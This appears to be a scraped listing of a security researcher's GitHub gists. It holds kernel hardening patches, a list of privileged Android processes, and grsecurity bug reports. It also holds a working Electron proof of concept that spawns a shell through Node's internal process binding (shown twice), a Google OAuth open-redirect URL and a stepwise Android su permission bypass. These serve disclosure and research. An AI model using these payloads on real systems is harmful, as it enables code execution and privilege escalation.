@thejh
thejh / perf_sample_regs_intr_demo.c
Created November 2, 2016 14:31
PERF_SAMPLE_REGS_INTR demo
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
thejh / gist:6a943fbbd89f81ffa28060dd4f60b390
Created October 29, 2016 13:36
privileged processes on pixel phones
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
thejh / gist:3bac7b2c79cdaaf569c702d9080320ed
Created October 25, 2016 19:28
old electron command exec
var Process = process.binding('process_wrap').Process; // Node's internal child-process binding
var proc = new Process();
proc.onexit = function(a, b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]); // KEY=VALUE pairs for envPairs
proc.spawn({
  file: '/bin/sh', args: ['sh', '-c', 'id > /tmp/owned'],
  cwd: null, windowsVerbatimArguments: false, detached: false,
  envPairs: env_,
  stdio: [{type: 'ignore'}, {type: 'ignore'}, {type: 'ignore'}]
});
thejh / 0001-drivers-tty-add-protected_ttys-sysctl.patch
Created August 24, 2016 23:58
some old tty hardening patches
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
thejh / rce.js
Created August 24, 2016 01:21
RCE using XSS in Electron
var Process = process.binding('process_wrap').Process; // Node's internal child-process binding
var proc = new Process();
proc.onexit = function(a, b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]); // KEY=VALUE pairs for envPairs
proc.spawn({
  file: '/bin/sh', args: ['sh', '-c', 'id > /tmp/owned'],
  cwd: null, windowsVerbatimArguments: false, detached: false,
  envPairs: env_,
  stdio: [{type: 'ignore'}, {type: 'ignore'}, {type: 'ignore'}]
});
thejh / GRKERNSEC_PTRACE_READEXEC bypasses
Created April 12, 2016 22:25
grsecurity bug reports
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <[email protected]>
To: Brad Spengler <[email protected]>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.
From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Sat, 2 Jan 2016 08:09:19 +0100
Subject: [PATCH] fs: allow unprivileged chroot()
Allow unprivileged processes to chroot() themselves, under the
following conditions:
- The caller must have set NO_NEW_PRIVS to prevent him from
invoking setuid/setgid/setcap executables in the chroot that
From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001
From: Jann Horn <[email protected]>
Date: Fri, 14 Aug 2015 17:47:01 +0200
Subject: [PATCH] drivers/tty: require read access for controlling terminal
This is mostly a hardening fix, given that write-only access to other
users' ttys is usually only given through setgid tty executables.
Signed-off-by: Jann Horn <[email protected]>
---
thejh / gist:5b6da6bf36d60c9e6082
Last active August 29, 2015 14:26
google oauth open redirect
https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none
thejh / gist:219deec09c3d99cfc9f2
Created July 30, 2015 02:56
ooold superuser vuln, reported to chainsdd 2012-08-13
root@android:/ # su 1000
system@android:/ $ cd /tmp
system@android:/tmp $ cat > foo
/system/bin/sh
1
rubbish
system@android:/tmp $ su -c "$(cat foo)"
# press "deny" now with "remember" option activated
Permission denied
1|system@android:/tmp $ su